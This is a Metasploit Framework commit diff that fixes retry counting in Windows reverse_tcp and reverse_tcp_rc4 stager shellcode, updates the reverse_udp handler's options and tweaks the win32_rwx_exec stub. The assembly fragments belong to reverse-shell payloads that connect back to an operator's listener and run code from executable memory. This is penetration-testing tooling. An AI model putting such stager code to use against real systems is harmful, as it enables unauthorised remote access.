Land rapid7#9564, honoring retry counts for x86/64 Windows reverse_tcp payloads

busterb · busterb · commit ae684c100259 · 2018-02-15T14:37:23.000-06:00
diff --git a/lib/msf/core/handler/reverse_udp.rb b/lib/msf/core/handler/reverse_udp.rb
@@ -51,12 +51,13 @@ def initialize(info = {})
     # XXX: Not supported by all modules
     register_advanced_options(
       [
-        OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
         OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
         OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
         OptBool.new('ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false])
-      ], Msf::Handler::ReverseUdp)
+      ] +
+      Msf::Opt::stager_retry_options,
+      Msf::Handler::ReverseUdp)
 
     self.conn_threads = []
   end
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -125,7 +125,8 @@ def asm_reverse_tcp(opts={})
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
         push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
-        call ebp                ; LoadLibraryA( "ws2_32" )
+        mov eax, ebp
+        call eax                ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
         sub esp, eax            ; alloc some space for the WSAData structure
@@ -298,7 +299,8 @@ def asm_block_recv(opts={})
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 
diff --git a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -142,7 +142,8 @@ def asm_block_recv_rc4(opts={})
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -1633,7 +1633,6 @@ def self.generate_nops(framework, arch, len, opts = {})
   # target code there, setting an exception handler that calls ExitProcess
   # and finally executing the code.
   def self.win32_rwx_exec(code)
-
     stub_block = %Q^
     ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
     ; Output: The return value from the API call will be in EAX.
@@ -1741,7 +1740,8 @@ def self.win32_rwx_exec(code)
     exitfunk:
       mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
       push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
-      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      mov eax, ebp
+      call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...

Original file line number	Diff line number	Diff line change
`@@ -142,7 +142,8 @@ def asm_block_recv_rc4(opts={})`
`142`	`142`	`dec [esp] ; decrement the counter`
`143`	`143`
`144`	`144`	`; try again`
`145`		`- jmp create_socket`
	`145`	`+ jnz create_socket`
	`146`	`+ jmp failure`
`146`	`147`	`^`
`147`	`148`	`end`
`148`	`149`